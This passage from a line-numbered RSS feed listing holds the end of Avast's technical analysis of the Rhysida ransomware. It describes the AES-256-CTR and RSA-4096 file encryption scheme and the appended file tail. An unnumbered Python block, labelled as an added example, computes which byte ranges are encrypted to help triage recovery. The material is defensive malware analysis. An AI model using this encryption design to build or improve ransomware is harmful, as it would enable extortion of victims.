  6881. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="670" height="217" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-05-get-file-size.png" alt="" class="wp-image-7755" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-05-get-file-size.png 670w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-05-get-file-size-300x97.png 300w" sizes="(max-width: 670px) 100vw, 670px" /></figure></div>
  6882.  
  6883.  
  6884. <ul>
  6885. <li>Based on the file size, Rhysida calculates counts and length shown in Table 1.&nbsp;</li>
  6886.  
  6887.  
  6888.  
  6889. <li>A 32-byte file encryption key and a 16-byte initialization vector for the AES-256 stream cipher are generated using the random number generator associated with the <code>Encryptor</code> thread.&nbsp;&nbsp;</li>
  6890.  
  6891.  
  6892.  
  6893. <li>Files are encrypted using AES-256 in <a href="https://github.com/libtom/libtomcrypt/blob/b96e96cf8b22a931e8e91098ac37bc72f9e2f033/src/modes/ctr/ctr_encrypt.c#L80" target="_blank" rel="noreferrer noopener">CTR mode</a>.&nbsp;</li>
  6894.  
  6895.  
  6896.  
  6897. <li>Both the file encryption key and the IV are encrypted with <a href="https://github.com/libtom/libtomcrypt/blob/b96e96cf8b22a931e8e91098ac37bc72f9e2f033/src/pk/rsa/rsa_encrypt_key.c#L27" target="_blank" rel="noreferrer noopener">RSA-4096</a> using OAEP padding and stored in the file tail structure.&nbsp;</li>
  6898.  
  6899.  
  6900.  
  6901. <li>This file tail is appended to the end of the encrypted file:&nbsp;</li>
  6902. </ul>
  6903.  
  6904.  
  6905. <div class="wp-block-image">
  6906. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="216" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-06-file-tail-1024x216.png" alt="" class="wp-image-7756" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-06-file-tail-1024x216.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-06-file-tail-300x63.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-06-file-tail-768x162.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-06-file-tail.png 1056w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure></div>
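The block layout of Table 1 and the file-size step, worked through as an added example (not code from the Avast analysis or from the ransomware): given only a file size, it returns the byte ranges Rhysida encrypts and the ranges left intact, including the effect of the early builds' 32-bit file-size bug, which matters when triaging how much of a large file survived. Assumed, because the write-up does not state them: size buckets are inclusive at the top, the block size uses integer division with the remainder going to the last block, and the encrypted 1 MB sits at the start of each block.

```python
"""Which bytes of a file does Rhysida encrypt, given only the file size?

Added example; not code from the Avast write-up or from the ransomware.
It implements the block scheme of Table 1 (files over 1 MB are split into
1-4 blocks and only 1 MB of each block is encrypted) and the early-build
bug that ignored the upper 32 bits of the file size.

Assumptions not stated in the write-up: size buckets are inclusive at the
top (a file of exactly 2 MB counts as "1 - 2 MB"), the block size uses
integer division with the remainder going to the last block, and the
encrypted 1 MB sits at the start of each block.
"""
from typing import List, Tuple

MB = 1048576  # "1 MB" as the ransomware counts it

Range = Tuple[int, int]  # (offset, length) in bytes


def block_count(size: int) -> int:
    """Block count per Table 1 for an (effective) file size."""
    if size <= 2 * MB:
        return 1  # 0-1 MB: whole file; 1-2 MB: first 1 MB only
    if size <= 3 * MB:
        return 2
    if size <= 4 * MB:
        return 3
    return 4


def effective_size(size: int, legacy_32bit_bug: bool = False) -> int:
    """Size the encryptor believes the file has.

    Early builds dropped the upper 32 bits of the 64-bit file size, so a
    file over 4 GiB was laid out as if it were (size mod 2**32) bytes long.
    """
    return size & 0xFFFFFFFF if legacy_32bit_bug else size


def encrypted_ranges(size: int, legacy_32bit_bug: bool = False) -> List[Range]:
    """Byte ranges that end up AES-256-CTR encrypted, in file order."""
    eff = effective_size(size, legacy_32bit_bug)
    if eff == 0:
        return []
    n = block_count(eff)
    block = eff // n
    ranges: List[Range] = []
    for i in range(n):
        start = i * block
        end = eff if i == n - 1 else start + block  # last block takes the remainder
        ranges.append((start, min(MB, end - start)))
    return ranges


def plaintext_ranges(size: int, legacy_32bit_bug: bool = False) -> List[Range]:
    """Complement of encrypted_ranges over the real file: bytes left intact."""
    intact: List[Range] = []
    cursor = 0
    for off, length in encrypted_ranges(size, legacy_32bit_bug):
        if off > cursor:
            intact.append((cursor, off - cursor))
        cursor = off + length
    if cursor < size:
        intact.append((cursor, size - cursor))
    return intact


if __name__ == "__main__":
    # Constructed sample sizes: one per Table 1 row, plus a file over 4 GiB
    samples = (500_000, 1_500_000, 2_500_000, 3_500_000, 10_000_000, 5 * 1024**3 + 100)
    for sz in samples:
        for bug in (False, True):
            enc = encrypted_ranges(sz, bug)
            kept = sum(length for _, length in plaintext_ranges(sz, bug))
            print(f"{sz:>11} bytes  legacy_bug={bug!s:5}  blocks={len(enc)}  intact_bytes={kept}")
```

With the legacy bug, a 5 GiB file is laid out as a ~1 GiB file, so everything past the first gigabyte is left untouched; later builds encrypt 1 MB in each quarter of the real file.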
  6907.  
  6908.  
  6909. <h2 class="wp-block-heading">Conclusion&nbsp;</h2>
  6910.  
  6911.  
  6912.  
  6913. <p>Rhysida is a relatively new ransomware, but it already has a long list of attacked organizations. As of October 2023, it is still under active development.&nbsp;&nbsp;</p>
  6914.  
  6915.  
  6916.  
  6917. <p>Victims of the Rhysida ransomware may contact us at <code>decryptors-at-avast-dot-com</code> for a consultation about how to mitigate damage caused by the attack.&nbsp;</p>
  6918. <p>The post <a href="https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/">Rhysida Ransomware Technical Analysis</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  6919. ]]></content:encoded>
  6920. </item>
  6921. </channel>
  6922. </rss>
  6923.  


Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda